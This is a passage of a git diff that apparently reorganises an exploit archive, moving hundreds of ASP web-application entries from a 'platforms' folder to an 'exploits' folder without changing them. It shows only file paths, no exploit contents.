exploits/asp/webapps/24049.txt diff --git a/platforms/asp/webapps/2416.txt b/exploits/asp/webapps/2416.txt similarity index 100% rename from platforms/asp/webapps/2416.txt rename to exploits/asp/webapps/2416.txt diff --git a/platforms/asp/webapps/24184.txt b/exploits/asp/webapps/24184.txt similarity index 100% rename from platforms/asp/webapps/24184.txt rename to exploits/asp/webapps/24184.txt diff --git a/platforms/asp/webapps/24185.txt b/exploits/asp/webapps/24185.txt similarity index 100% rename from platforms/asp/webapps/24185.txt rename to exploits/asp/webapps/24185.txt diff --git a/platforms/asp/webapps/24198.txt b/exploits/asp/webapps/24198.txt similarity index 100% rename from platforms/asp/webapps/24198.txt rename to exploits/asp/webapps/24198.txt diff --git a/platforms/asp/webapps/2421.pl b/exploits/asp/webapps/2421.pl similarity index 100% rename from platforms/asp/webapps/2421.pl rename to exploits/asp/webapps/2421.pl diff --git a/platforms/asp/webapps/24214.txt b/exploits/asp/webapps/24214.txt similarity index 100% rename from platforms/asp/webapps/24214.txt rename to exploits/asp/webapps/24214.txt diff --git a/platforms/asp/webapps/2423.txt b/exploits/asp/webapps/2423.txt similarity index 100% rename from platforms/asp/webapps/2423.txt rename to exploits/asp/webapps/2423.txt diff --git a/platforms/asp/webapps/24260.txt b/exploits/asp/webapps/24260.txt similarity index 100% rename from platforms/asp/webapps/24260.txt rename to exploits/asp/webapps/24260.txt diff --git a/platforms/asp/webapps/24261.txt b/exploits/asp/webapps/24261.txt similarity index 100% rename from platforms/asp/webapps/24261.txt rename to exploits/asp/webapps/24261.txt diff --git a/platforms/asp/webapps/24298.pl b/exploits/asp/webapps/24298.pl similarity index 100% rename from platforms/asp/webapps/24298.pl rename to exploits/asp/webapps/24298.pl diff --git a/platforms/asp/webapps/24299.pl b/exploits/asp/webapps/24299.pl similarity index 100% rename from platforms/asp/webapps/24299.pl rename to exploits/asp/webapps/24299.pl diff --git a/platforms/asp/webapps/24300.pl b/exploits/asp/webapps/24300.pl similarity index 100% rename from platforms/asp/webapps/24300.pl rename to exploits/asp/webapps/24300.pl diff --git a/platforms/asp/webapps/24302.pl b/exploits/asp/webapps/24302.pl similarity index 100% rename from platforms/asp/webapps/24302.pl rename to exploits/asp/webapps/24302.pl diff --git a/platforms/asp/webapps/24313.txt b/exploits/asp/webapps/24313.txt similarity index 100% rename from platforms/asp/webapps/24313.txt rename to exploits/asp/webapps/24313.txt diff --git a/platforms/asp/webapps/24314.txt b/exploits/asp/webapps/24314.txt similarity index 100% rename from platforms/asp/webapps/24314.txt rename to exploits/asp/webapps/24314.txt diff --git a/platforms/asp/webapps/24315.txt b/exploits/asp/webapps/24315.txt similarity index 100% rename from platforms/asp/webapps/24315.txt rename to exploits/asp/webapps/24315.txt diff --git a/platforms/asp/webapps/24316.txt b/exploits/asp/webapps/24316.txt similarity index 100% rename from platforms/asp/webapps/24316.txt rename to exploits/asp/webapps/24316.txt diff --git a/platforms/asp/webapps/24317.txt b/exploits/asp/webapps/24317.txt similarity index 100% rename from platforms/asp/webapps/24317.txt rename to exploits/asp/webapps/24317.txt diff --git a/platforms/asp/webapps/24368.txt b/exploits/asp/webapps/24368.txt similarity index 100% rename from platforms/asp/webapps/24368.txt rename to exploits/asp/webapps/24368.txt diff --git a/platforms/asp/webapps/24369.txt b/exploits/asp/webapps/24369.txt similarity index 100% rename from platforms/asp/webapps/24369.txt rename to exploits/asp/webapps/24369.txt diff --git a/platforms/asp/webapps/24370.txt b/exploits/asp/webapps/24370.txt similarity index 100% rename from platforms/asp/webapps/24370.txt rename to exploits/asp/webapps/24370.txt diff --git a/platforms/asp/webapps/24371.txt b/exploits/asp/webapps/24371.txt similarity index 100% rename from platforms/asp/webapps/24371.txt rename to exploits/asp/webapps/24371.txt diff --git a/platforms/asp/webapps/24385.txt b/exploits/asp/webapps/24385.txt similarity index 100% rename from platforms/asp/webapps/24385.txt rename to exploits/asp/webapps/24385.txt diff --git a/platforms/asp/webapps/24397.txt b/exploits/asp/webapps/24397.txt similarity index 100% rename from platforms/asp/webapps/24397.txt rename to exploits/asp/webapps/24397.txt diff --git a/platforms/asp/webapps/24420.txt b/exploits/asp/webapps/24420.txt similarity index 100% rename from platforms/asp/webapps/24420.txt rename to exploits/asp/webapps/24420.txt diff --git a/platforms/asp/webapps/24422.txt b/exploits/asp/webapps/24422.txt similarity index 100% rename from platforms/asp/webapps/24422.txt rename to exploits/asp/webapps/24422.txt diff --git a/platforms/asp/webapps/24588.txt b/exploits/asp/webapps/24588.txt similarity index 100% rename from platforms/asp/webapps/24588.txt rename to exploits/asp/webapps/24588.txt diff --git a/platforms/asp/webapps/24589.txt b/exploits/asp/webapps/24589.txt similarity index 100% rename from platforms/asp/webapps/24589.txt rename to exploits/asp/webapps/24589.txt diff --git a/platforms/asp/webapps/24604.txt b/exploits/asp/webapps/24604.txt similarity index 100% rename from platforms/asp/webapps/24604.txt rename to exploits/asp/webapps/24604.txt diff --git a/platforms/asp/webapps/24625.txt b/exploits/asp/webapps/24625.txt similarity index 100% rename from platforms/asp/webapps/24625.txt rename to exploits/asp/webapps/24625.txt diff --git a/platforms/asp/webapps/24626.txt b/exploits/asp/webapps/24626.txt similarity index 100% rename from platforms/asp/webapps/24626.txt rename to exploits/asp/webapps/24626.txt diff --git a/platforms/asp/webapps/24631.txt b/exploits/asp/webapps/24631.txt similarity index 100% rename from platforms/asp/webapps/24631.txt rename to exploits/asp/webapps/24631.txt diff --git a/platforms/asp/webapps/24632.txt b/exploits/asp/webapps/24632.txt similarity index 100% rename from platforms/asp/webapps/24632.txt rename to exploits/asp/webapps/24632.txt diff --git a/platforms/asp/webapps/24633.txt b/exploits/asp/webapps/24633.txt similarity index 100% rename from platforms/asp/webapps/24633.txt rename to exploits/asp/webapps/24633.txt diff --git a/platforms/asp/webapps/24666.txt b/exploits/asp/webapps/24666.txt similarity index 100% rename from platforms/asp/webapps/24666.txt rename to exploits/asp/webapps/24666.txt diff --git a/platforms/asp/webapps/24670.txt b/exploits/asp/webapps/24670.txt similarity index 100% rename from platforms/asp/webapps/24670.txt rename to exploits/asp/webapps/24670.txt diff --git a/platforms/asp/webapps/24671.txt b/exploits/asp/webapps/24671.txt similarity index 100% rename from platforms/asp/webapps/24671.txt rename to exploits/asp/webapps/24671.txt diff --git a/platforms/asp/webapps/24672.txt b/exploits/asp/webapps/24672.txt similarity index 100% rename from platforms/asp/webapps/24672.txt rename to exploits/asp/webapps/24672.txt diff --git a/platforms/asp/webapps/24673.txt b/exploits/asp/webapps/24673.txt similarity index 100% rename from platforms/asp/webapps/24673.txt rename to exploits/asp/webapps/24673.txt diff --git a/platforms/asp/webapps/24674.txt b/exploits/asp/webapps/24674.txt similarity index 100% rename from platforms/asp/webapps/24674.txt rename to exploits/asp/webapps/24674.txt diff --git a/platforms/asp/webapps/24675.txt b/exploits/asp/webapps/24675.txt similarity index 100% rename from platforms/asp/webapps/24675.txt rename to exploits/asp/webapps/24675.txt diff --git a/platforms/asp/webapps/24717.txt b/exploits/asp/webapps/24717.txt similarity index 100% rename from platforms/asp/webapps/24717.txt rename to exploits/asp/webapps/24717.txt diff --git a/platforms/asp/webapps/24838.txt b/exploits/asp/webapps/24838.txt similarity index 100% rename from platforms/asp/webapps/24838.txt rename to exploits/asp/webapps/24838.txt diff --git a/platforms/asp/webapps/24840.txt b/exploits/asp/webapps/24840.txt similarity index 100% rename from platforms/asp/webapps/24840.txt rename to exploits/asp/webapps/24840.txt diff --git a/platforms/asp/webapps/25060.txt b/exploits/asp/webapps/25060.txt similarity index 100% rename from platforms/asp/webapps/25060.txt rename to exploits/asp/webapps/25060.txt diff --git a/platforms/asp/webapps/25078.txt b/exploits/asp/webapps/25078.txt similarity index 100% rename from platforms/asp/webapps/25078.txt rename to exploits/asp/webapps/25078.txt diff --git a/platforms/asp/webapps/25084.txt b/exploits/asp/webapps/25084.txt similarity index 100% rename from platforms/asp/webapps/25084.txt rename to exploits/asp/webapps/25084.txt diff --git a/platforms/asp/webapps/25110.txt b/exploits/asp/webapps/25110.txt similarity index 100% rename from platforms/asp/webapps/25110.txt rename to exploits/asp/webapps/25110.txt diff --git a/platforms/asp/webapps/25148.txt b/exploits/asp/webapps/25148.txt similarity index 100% rename from platforms/asp/webapps/25148.txt rename to exploits/asp/webapps/25148.txt diff --git a/platforms/asp/webapps/25233.txt b/exploits/asp/webapps/25233.txt similarity index 100% rename from platforms/asp/webapps/25233.txt rename to exploits/asp/webapps/25233.txt diff --git a/platforms/asp/webapps/25252.txt b/exploits/asp/webapps/25252.txt similarity index 100% rename from platforms/asp/webapps/25252.txt rename to exploits/asp/webapps/25252.txt diff --git a/platforms/asp/webapps/25253.txt b/exploits/asp/webapps/25253.txt similarity index 100% rename from platforms/asp/webapps/25253.txt rename to exploits/asp/webapps/25253.txt diff --git a/platforms/asp/webapps/25254.txt b/exploits/asp/webapps/25254.txt similarity index 100% rename from platforms/asp/webapps/25254.txt rename to exploits/asp/webapps/25254.txt diff --git a/platforms/asp/webapps/25313.txt b/exploits/asp/webapps/25313.txt similarity index 100% rename from platforms/asp/webapps/25313.txt rename to exploits/asp/webapps/25313.txt diff --git a/platforms/asp/webapps/25318.txt b/exploits/asp/webapps/25318.txt similarity index 100% rename from platforms/asp/webapps/25318.txt rename to exploits/asp/webapps/25318.txt diff --git a/platforms/asp/webapps/25324.txt b/exploits/asp/webapps/25324.txt similarity index 100% rename from platforms/asp/webapps/25324.txt rename to exploits/asp/webapps/25324.txt diff --git a/platforms/asp/webapps/25332.txt b/exploits/asp/webapps/25332.txt similarity index 100% rename from platforms/asp/webapps/25332.txt rename to exploits/asp/webapps/25332.txt diff --git a/platforms/asp/webapps/25346.txt b/exploits/asp/webapps/25346.txt similarity index 100% rename from platforms/asp/webapps/25346.txt rename to exploits/asp/webapps/25346.txt diff --git a/platforms/asp/webapps/25347.txt b/exploits/asp/webapps/25347.txt similarity index 100% rename from platforms/asp/webapps/25347.txt rename to exploits/asp/webapps/25347.txt diff --git a/platforms/asp/webapps/25348.txt b/exploits/asp/webapps/25348.txt similarity index 100% rename from platforms/asp/webapps/25348.txt rename to exploits/asp/webapps/25348.txt diff --git a/platforms/asp/webapps/25349.txt b/exploits/asp/webapps/25349.txt similarity index 100% rename from platforms/asp/webapps/25349.txt rename to exploits/asp/webapps/25349.txt diff --git a/platforms/asp/webapps/25351.txt b/exploits/asp/webapps/25351.txt similarity index 100% rename from platforms/asp/webapps/25351.txt rename to exploits/asp/webapps/25351.txt diff --git a/platforms/asp/webapps/25352.txt b/exploits/asp/webapps/25352.txt similarity index 100% rename from platforms/asp/webapps/25352.txt rename to exploits/asp/webapps/25352.txt diff --git a/platforms/asp/webapps/25390.txt b/exploits/asp/webapps/25390.txt similarity index 100% rename from platforms/asp/webapps/25390.txt rename to exploits/asp/webapps/25390.txt diff --git a/platforms/asp/webapps/25424.txt b/exploits/asp/webapps/25424.txt similarity index 100% rename from platforms/asp/webapps/25424.txt rename to exploits/asp/webapps/25424.txt diff --git a/platforms/asp/webapps/25425.txt b/exploits/asp/webapps/25425.txt similarity index 100% rename from platforms/asp/webapps/25425.txt rename to exploits/asp/webapps/25425.txt diff --git a/platforms/asp/webapps/25426.txt b/exploits/asp/webapps/25426.txt similarity index 100% rename from platforms/asp/webapps/25426.txt rename to exploits/asp/webapps/25426.txt diff --git a/platforms/asp/webapps/25427.txt b/exploits/asp/webapps/25427.txt similarity index 100% rename from platforms/asp/webapps/25427.txt rename to exploits/asp/webapps/25427.txt diff --git a/platforms/asp/webapps/25428.txt b/exploits/asp/webapps/25428.txt similarity index 100% rename from platforms/asp/webapps/25428.txt rename to exploits/asp/webapps/25428.txt diff --git a/platforms/asp/webapps/25455.txt b/exploits/asp/webapps/25455.txt similarity index 100% rename from platforms/asp/webapps/25455.txt rename to exploits/asp/webapps/25455.txt diff --git a/platforms/asp/webapps/25456.txt b/exploits/asp/webapps/25456.txt similarity index 100% rename from platforms/asp/webapps/25456.txt rename to exploits/asp/webapps/25456.txt diff --git a/platforms/asp/webapps/25466.txt b/exploits/asp/webapps/25466.txt similarity index 100% rename from platforms/asp/webapps/25466.txt rename to exploits/asp/webapps/25466.txt diff --git a/platforms/asp/webapps/25476.txt b/exploits/asp/webapps/25476.txt similarity index 100% rename from platforms/asp/webapps/25476.txt rename to exploits/asp/webapps/25476.txt diff --git a/platforms/asp/webapps/25477.txt b/exploits/asp/webapps/25477.txt similarity index 100% rename from platforms/asp/webapps/25477.txt rename to exploits/asp/webapps/25477.txt diff --git a/platforms/asp/webapps/25478.txt b/exploits/asp/webapps/25478.txt similarity index 100% rename from platforms/asp/webapps/25478.txt rename to exploits/asp/webapps/25478.txt diff --git a/platforms/asp/webapps/25479.txt b/exploits/asp/webapps/25479.txt similarity index 100% rename from platforms/asp/webapps/25479.txt rename to exploits/asp/webapps/25479.txt diff --git a/platforms/asp/webapps/25480.txt b/exploits/asp/webapps/25480.txt similarity index 100% rename from platforms/asp/webapps/25480.txt rename to exploits/asp/webapps/25480.txt diff --git a/platforms/asp/webapps/25481.txt b/exploits/asp/webapps/25481.txt similarity index 100% rename from platforms/asp/webapps/25481.txt rename to exploits/asp/webapps/25481.txt diff --git a/platforms/asp/webapps/25482.txt b/exploits/asp/webapps/25482.txt similarity index 100% rename from platforms/asp/webapps/25482.txt rename to exploits/asp/webapps/25482.txt diff --git a/platforms/asp/webapps/25483.txt b/exploits/asp/webapps/25483.txt similarity index 100% rename from platforms/asp/webapps/25483.txt rename to exploits/asp/webapps/25483.txt diff --git a/platforms/asp/webapps/25484.txt b/exploits/asp/webapps/25484.txt similarity index 100% rename from platforms/asp/webapps/25484.txt rename to exploits/asp/webapps/25484.txt diff --git a/platforms/asp/webapps/25485.txt b/exploits/asp/webapps/25485.txt similarity index 100% rename from platforms/asp/webapps/25485.txt rename to exploits/asp/webapps/25485.txt diff --git a/platforms/asp/webapps/25498.txt b/exploits/asp/webapps/25498.txt similarity index 100% rename from platforms/asp/webapps/25498.txt rename to exploits/asp/webapps/25498.txt diff --git a/platforms/asp/webapps/25500.txt b/exploits/asp/webapps/25500.txt similarity index 100% rename from platforms/asp/webapps/25500.txt rename to exploits/asp/webapps/25500.txt diff --git a/platforms/asp/webapps/25501.txt b/exploits/asp/webapps/25501.txt similarity index 100% rename from platforms/asp/webapps/25501.txt rename to exploits/asp/webapps/25501.txt diff --git a/platforms/asp/webapps/25502.txt b/exploits/asp/webapps/25502.txt similarity index 100% rename from platforms/asp/webapps/25502.txt rename to exploits/asp/webapps/25502.txt diff --git a/platforms/asp/webapps/25504.txt b/exploits/asp/webapps/25504.txt similarity index 100% rename from platforms/asp/webapps/25504.txt rename to exploits/asp/webapps/25504.txt diff --git a/platforms/asp/webapps/25505.txt b/exploits/asp/webapps/25505.txt similarity index 100% rename from platforms/asp/webapps/25505.txt rename to exploits/asp/webapps/25505.txt diff --git a/platforms/asp/webapps/25506.txt b/exploits/asp/webapps/25506.txt similarity index 100% rename from platforms/asp/webapps/25506.txt rename to exploits/asp/webapps/25506.txt diff --git a/platforms/asp/webapps/25507.txt b/exploits/asp/webapps/25507.txt similarity index 100% rename from platforms/asp/webapps/25507.txt rename to exploits/asp/webapps/25507.txt diff --git a/platforms/asp/webapps/25508.txt b/exploits/asp/webapps/25508.txt similarity index 100% rename from platforms/asp/webapps/25508.txt rename to exploits/asp/webapps/25508.txt diff --git a/platforms/asp/webapps/25509.txt b/exploits/asp/webapps/25509.txt similarity index 100% rename from platforms/asp/webapps/25509.txt rename to exploits/asp/webapps/25509.txt diff --git a/platforms/asp/webapps/25510.txt b/exploits/asp/webapps/25510.txt similarity index 100% rename from platforms/asp/webapps/25510.txt rename to exploits/asp/webapps/25510.txt diff --git a/platforms/asp/webapps/25511.txt b/exploits/asp/webapps/25511.txt similarity index 100% rename from platforms/asp/webapps/25511.txt rename to exploits/asp/webapps/25511.txt diff --git a/platforms/asp/webapps/25512.txt b/exploits/asp/webapps/25512.txt similarity index 100% rename from platforms/asp/webapps/25512.txt rename to exploits/asp/webapps/25512.txt diff --git a/platforms/asp/webapps/25513.txt b/exploits/asp/webapps/25513.txt similarity index 100% rename from platforms/asp/webapps/25513.txt rename to exploits/asp/webapps/25513.txt diff --git a/platforms/asp/webapps/25514.txt b/exploits/asp/webapps/25514.txt similarity index 100% rename from platforms/asp/webapps/25514.txt rename to exploits/asp/webapps/25514.txt diff --git a/platforms/asp/webapps/25515.txt b/exploits/asp/webapps/25515.txt similarity index 100% rename from platforms/asp/webapps/25515.txt rename to exploits/asp/webapps/25515.txt diff --git a/platforms/asp/webapps/25516.txt b/exploits/asp/webapps/25516.txt similarity index 100% rename from platforms/asp/webapps/25516.txt rename to exploits/asp/webapps/25516.txt diff --git a/platforms/asp/webapps/25520.txt b/exploits/asp/webapps/25520.txt similarity index 100% rename from platforms/asp/webapps/25520.txt rename to exploits/asp/webapps/25520.txt diff --git a/platforms/asp/webapps/25521.txt b/exploits/asp/webapps/25521.txt similarity index 100% rename from platforms/asp/webapps/25521.txt rename to exploits/asp/webapps/25521.txt diff --git a/platforms/asp/webapps/25522.txt b/exploits/asp/webapps/25522.txt similarity index 100% rename from platforms/asp/webapps/25522.txt rename to exploits/asp/webapps/25522.txt diff --git a/platforms/asp/webapps/25529.txt b/exploits/asp/webapps/25529.txt similarity index 100% rename from platforms/asp/webapps/25529.txt rename to exploits/asp/webapps/25529.txt diff --git a/platforms/asp/webapps/25530.txt b/exploits/asp/webapps/25530.txt similarity index 100% rename from platforms/asp/webapps/25530.txt rename to exploits/asp/webapps/25530.txt diff --git a/platforms/asp/webapps/25536.txt b/exploits/asp/webapps/25536.txt similarity index 100% rename from platforms/asp/webapps/25536.txt rename to exploits/asp/webapps/25536.txt diff --git a/platforms/asp/webapps/25537.txt b/exploits/asp/webapps/25537.txt similarity index 100% rename from platforms/asp/webapps/25537.txt rename to exploits/asp/webapps/25537.txt diff --git a/platforms/asp/webapps/25539.txt b/exploits/asp/webapps/25539.txt similarity index 100% rename from platforms/asp/webapps/25539.txt rename to exploits/asp/webapps/25539.txt diff --git a/platforms/asp/webapps/25540.txt b/exploits/asp/webapps/25540.txt similarity index 100% rename from platforms/asp/webapps/25540.txt rename to exploits/asp/webapps/25540.txt diff --git a/platforms/asp/webapps/25541.txt b/exploits/asp/webapps/25541.txt similarity index 100% rename from platforms/asp/webapps/25541.txt rename to exploits/asp/webapps/25541.txt diff --git a/platforms/asp/webapps/25542.txt b/exploits/asp/webapps/25542.txt similarity index 100% rename from platforms/asp/webapps/25542.txt rename to exploits/asp/webapps/25542.txt diff --git a/platforms/asp/webapps/25543.txt b/exploits/asp/webapps/25543.txt similarity index 100% rename from platforms/asp/webapps/25543.txt rename to exploits/asp/webapps/25543.txt diff --git a/platforms/asp/webapps/25544.txt b/exploits/asp/webapps/25544.txt similarity index 100% rename from platforms/asp/webapps/25544.txt rename to exploits/asp/webapps/25544.txt diff --git a/platforms/asp/webapps/25585.txt b/exploits/asp/webapps/25585.txt similarity index 100% rename from platforms/asp/webapps/25585.txt rename to exploits/asp/webapps/25585.txt diff --git a/platforms/asp/webapps/25586.txt b/exploits/asp/webapps/25586.txt similarity index 100% rename from platforms/asp/webapps/25586.txt rename to exploits/asp/webapps/25586.txt diff --git a/platforms/asp/webapps/25587.txt b/exploits/asp/webapps/25587.txt similarity index 100% rename from platforms/asp/webapps/25587.txt rename to exploits/asp/webapps/25587.txt diff --git a/platforms/asp/webapps/25588.txt b/exploits/asp/webapps/25588.txt similarity index 100% rename from platforms/asp/webapps/25588.txt rename to exploits/asp/webapps/25588.txt diff --git a/platforms/asp/webapps/25589.txt b/exploits/asp/webapps/25589.txt similarity index 100% rename from platforms/asp/webapps/25589.txt rename to exploits/asp/webapps/25589.txt diff --git a/platforms/asp/webapps/25595.txt b/exploits/asp/webapps/25595.txt similarity index 100% rename from platforms/asp/webapps/25595.txt rename to exploits/asp/webapps/25595.txt diff --git a/platforms/asp/webapps/25596.txt b/exploits/asp/webapps/25596.txt similarity index 100% rename from platforms/asp/webapps/25596.txt rename to exploits/asp/webapps/25596.txt diff --git a/platforms/asp/webapps/25651.txt b/exploits/asp/webapps/25651.txt similarity index 100% rename from platforms/asp/webapps/25651.txt rename to exploits/asp/webapps/25651.txt diff --git a/platforms/asp/webapps/25661.txt b/exploits/asp/webapps/25661.txt similarity index 100% rename from platforms/asp/webapps/25661.txt rename to exploits/asp/webapps/25661.txt diff --git a/platforms/asp/webapps/25667.txt b/exploits/asp/webapps/25667.txt similarity index 100% rename from platforms/asp/webapps/25667.txt rename to exploits/asp/webapps/25667.txt diff --git a/platforms/asp/webapps/25700.txt b/exploits/asp/webapps/25700.txt similarity index 100% rename from platforms/asp/webapps/25700.txt rename to exploits/asp/webapps/25700.txt diff --git a/platforms/asp/webapps/25701.txt b/exploits/asp/webapps/25701.txt similarity index 100% rename from platforms/asp/webapps/25701.txt rename to exploits/asp/webapps/25701.txt diff --git a/platforms/asp/webapps/25705.txt b/exploits/asp/webapps/25705.txt similarity index 100% rename from platforms/asp/webapps/25705.txt rename to exploits/asp/webapps/25705.txt diff --git a/platforms/asp/webapps/25751.txt b/exploits/asp/webapps/25751.txt similarity index 100% rename from platforms/asp/webapps/25751.txt rename to exploits/asp/webapps/25751.txt diff --git a/platforms/asp/webapps/25753.txt b/exploits/asp/webapps/25753.txt similarity index 100% rename from platforms/asp/webapps/25753.txt rename to exploits/asp/webapps/25753.txt diff --git a/platforms/asp/webapps/25754.txt b/exploits/asp/webapps/25754.txt similarity index 100% rename from platforms/asp/webapps/25754.txt rename to exploits/asp/webapps/25754.txt diff --git a/platforms/asp/webapps/25758.txt b/exploits/asp/webapps/25758.txt similarity index 100% rename from platforms/asp/webapps/25758.txt rename to exploits/asp/webapps/25758.txt diff --git a/platforms/asp/webapps/25780.txt b/exploits/asp/webapps/25780.txt similarity index 100% rename from platforms/asp/webapps/25780.txt rename to exploits/asp/webapps/25780.txt diff --git a/platforms/asp/webapps/25781.txt b/exploits/asp/webapps/25781.txt similarity index 100% rename from platforms/asp/webapps/25781.txt rename to exploits/asp/webapps/25781.txt diff --git a/platforms/asp/webapps/25783.txt b/exploits/asp/webapps/25783.txt similarity index 100% rename from platforms/asp/webapps/25783.txt rename to exploits/asp/webapps/25783.txt diff --git a/platforms/asp/webapps/25785.txt b/exploits/asp/webapps/25785.txt similarity index 100% rename from platforms/asp/webapps/25785.txt rename to exploits/asp/webapps/25785.txt diff --git a/platforms/asp/webapps/25790.txt b/exploits/asp/webapps/25790.txt similarity index 100% rename from platforms/asp/webapps/25790.txt rename to exploits/asp/webapps/25790.txt diff --git a/platforms/asp/webapps/25795.txt b/exploits/asp/webapps/25795.txt similarity index 100% rename from platforms/asp/webapps/25795.txt rename to exploits/asp/webapps/25795.txt diff --git a/platforms/asp/webapps/25796.txt b/exploits/asp/webapps/25796.txt similarity index 100% rename from platforms/asp/webapps/25796.txt rename to exploits/asp/webapps/25796.txt diff --git a/platforms/asp/webapps/25797.txt b/exploits/asp/webapps/25797.txt similarity index 100% rename from platforms/asp/webapps/25797.txt rename to exploits/asp/webapps/25797.txt diff --git a/platforms/asp/webapps/25798.txt b/exploits/asp/webapps/25798.txt similarity index 100% rename from platforms/asp/webapps/25798.txt rename to exploits/asp/webapps/25798.txt diff --git a/platforms/asp/webapps/25804.txt b/exploits/asp/webapps/25804.txt similarity index 100% rename from platforms/asp/webapps/25804.txt rename to exploits/asp/webapps/25804.txt diff --git a/platforms/asp/webapps/25805.txt b/exploits/asp/webapps/25805.txt similarity index 100% rename from platforms/asp/webapps/25805.txt rename to exploits/asp/webapps/25805.txt diff --git a/platforms/asp/webapps/25839.txt b/exploits/asp/webapps/25839.txt similarity index 100% rename from platforms/asp/webapps/25839.txt rename to exploits/asp/webapps/25839.txt diff --git a/platforms/asp/webapps/25843.txt b/exploits/asp/webapps/25843.txt similarity index 100% rename from platforms/asp/webapps/25843.txt rename to exploits/asp/webapps/25843.txt diff --git a/platforms/asp/webapps/25844.txt b/exploits/asp/webapps/25844.txt similarity index 100% rename from platforms/asp/webapps/25844.txt rename to exploits/asp/webapps/25844.txt diff --git a/platforms/asp/webapps/25845.txt b/exploits/asp/webapps/25845.txt similarity index 100% rename from platforms/asp/webapps/25845.txt rename to exploits/asp/webapps/25845.txt diff --git a/platforms/asp/webapps/25847.txt b/exploits/asp/webapps/25847.txt similarity index 100% rename from platforms/asp/webapps/25847.txt rename to exploits/asp/webapps/25847.txt diff --git a/platforms/asp/webapps/25853.txt b/exploits/asp/webapps/25853.txt similarity index 100% rename from platforms/asp/webapps/25853.txt rename to exploits/asp/webapps/25853.txt diff --git a/platforms/asp/webapps/25855.txt b/exploits/asp/webapps/25855.txt similarity index 100% rename from platforms/asp/webapps/25855.txt rename to exploits/asp/webapps/25855.txt diff --git a/platforms/asp/webapps/25858.txt b/exploits/asp/webapps/25858.txt similarity index 100% rename from platforms/asp/webapps/25858.txt rename to exploits/asp/webapps/25858.txt diff --git a/platforms/asp/webapps/25863.txt b/exploits/asp/webapps/25863.txt similarity index 100% rename from platforms/asp/webapps/25863.txt rename to exploits/asp/webapps/25863.txt diff --git a/platforms/asp/webapps/25864.txt b/exploits/asp/webapps/25864.txt similarity index 100% rename from platforms/asp/webapps/25864.txt rename to exploits/asp/webapps/25864.txt diff --git a/platforms/asp/webapps/25865.txt b/exploits/asp/webapps/25865.txt similarity index 100% rename from platforms/asp/webapps/25865.txt rename to exploits/asp/webapps/25865.txt diff --git a/platforms/asp/webapps/25866.txt b/exploits/asp/webapps/25866.txt similarity index 100% rename from platforms/asp/webapps/25866.txt rename to exploits/asp/webapps/25866.txt diff --git a/platforms/asp/webapps/25867.txt b/exploits/asp/webapps/25867.txt similarity index 100% rename from platforms/asp/webapps/25867.txt rename to exploits/asp/webapps/25867.txt diff --git a/platforms/asp/webapps/25868.txt b/exploits/asp/webapps/25868.txt similarity index 100% rename from platforms/asp/webapps/25868.txt rename to exploits/asp/webapps/25868.txt diff --git a/platforms/asp/webapps/25869.txt b/exploits/asp/webapps/25869.txt similarity index 100% rename from platforms/asp/webapps/25869.txt rename to exploits/asp/webapps/25869.txt diff --git a/platforms/asp/webapps/25870.txt b/exploits/asp/webapps/25870.txt similarity index 100% rename from platforms/asp/webapps/25870.txt rename to exploits/asp/webapps/25870.txt diff --git a/platforms/asp/webapps/25871.txt b/exploits/asp/webapps/25871.txt similarity index 100% rename from platforms/asp/webapps/25871.txt rename to exploits/asp/webapps/25871.txt diff --git a/platforms/asp/webapps/25872.txt b/exploits/asp/webapps/25872.txt similarity index 100% rename from platforms/asp/webapps/25872.txt rename to exploits/asp/webapps/25872.txt diff --git a/platforms/asp/webapps/25873.txt b/exploits/asp/webapps/25873.txt similarity index 100% rename from platforms/asp/webapps/25873.txt rename to exploits/asp/webapps/25873.txt diff --git a/platforms/asp/webapps/25874.txt b/exploits/asp/webapps/25874.txt similarity index 100% rename from platforms/asp/webapps/25874.txt rename to exploits/asp/webapps/25874.txt diff --git a/platforms/asp/webapps/25905.txt b/exploits/asp/webapps/25905.txt similarity index 100% rename from platforms/asp/webapps/25905.txt rename to exploits/asp/webapps/25905.txt diff --git a/platforms/asp/webapps/25906.txt b/exploits/asp/webapps/25906.txt similarity index 100% rename from platforms/asp/webapps/25906.txt rename to exploits/asp/webapps/25906.txt diff --git a/platforms/asp/webapps/25907.txt b/exploits/asp/webapps/25907.txt similarity index 100% rename from platforms/asp/webapps/25907.txt rename to exploits/asp/webapps/25907.txt diff --git a/platforms/asp/webapps/25908.txt b/exploits/asp/webapps/25908.txt similarity index 100% rename from platforms/asp/webapps/25908.txt rename to exploits/asp/webapps/25908.txt diff --git a/platforms/asp/webapps/25910.txt b/exploits/asp/webapps/25910.txt similarity index 100% rename from platforms/asp/webapps/25910.txt rename to exploits/asp/webapps/25910.txt diff --git a/platforms/asp/webapps/25913.txt b/exploits/asp/webapps/25913.txt similarity index 100% rename from platforms/asp/webapps/25913.txt rename to exploits/asp/webapps/25913.txt diff --git a/platforms/asp/webapps/25914.txt b/exploits/asp/webapps/25914.txt similarity index 100% rename from platforms/asp/webapps/25914.txt rename to exploits/asp/webapps/25914.txt diff --git a/platforms/asp/webapps/2592.html b/exploits/asp/webapps/2592.html similarity index 100% rename from platforms/asp/webapps/2592.html rename to exploits/asp/webapps/2592.html diff --git a/platforms/asp/webapps/25922.txt b/exploits/asp/webapps/25922.txt similarity index 100% rename from platforms/asp/webapps/25922.txt rename to exploits/asp/webapps/25922.txt diff --git a/platforms/asp/webapps/25923.txt b/exploits/asp/webapps/25923.txt similarity index 100% rename from platforms/asp/webapps/25923.txt rename to exploits/asp/webapps/25923.txt diff --git a/platforms/asp/webapps/25924.txt b/exploits/asp/webapps/25924.txt similarity index 100% rename from platforms/asp/webapps/25924.txt rename to exploits/asp/webapps/25924.txt diff --git a/platforms/asp/webapps/25925.txt b/exploits/asp/webapps/25925.txt similarity index 100% rename from platforms/asp/webapps/25925.txt rename to exploits/asp/webapps/25925.txt diff --git a/platforms/asp/webapps/25953.txt b/exploits/asp/webapps/25953.txt similarity index 100% rename from platforms/asp/webapps/25953.txt rename to exploits/asp/webapps/25953.txt diff --git a/platforms/asp/webapps/25956.txt b/exploits/asp/webapps/25956.txt similarity index 100% rename from platforms/asp/webapps/25956.txt rename to exploits/asp/webapps/25956.txt diff --git a/platforms/asp/webapps/25963.txt b/exploits/asp/webapps/25963.txt similarity index 100% rename from platforms/asp/webapps/25963.txt rename to exploits/asp/webapps/25963.txt diff --git a/platforms/asp/webapps/25965.txt b/exploits/asp/webapps/25965.txt similarity index 100% rename from platforms/asp/webapps/25965.txt rename to exploits/asp/webapps/25965.txt diff --git a/platforms/asp/webapps/25981.txt 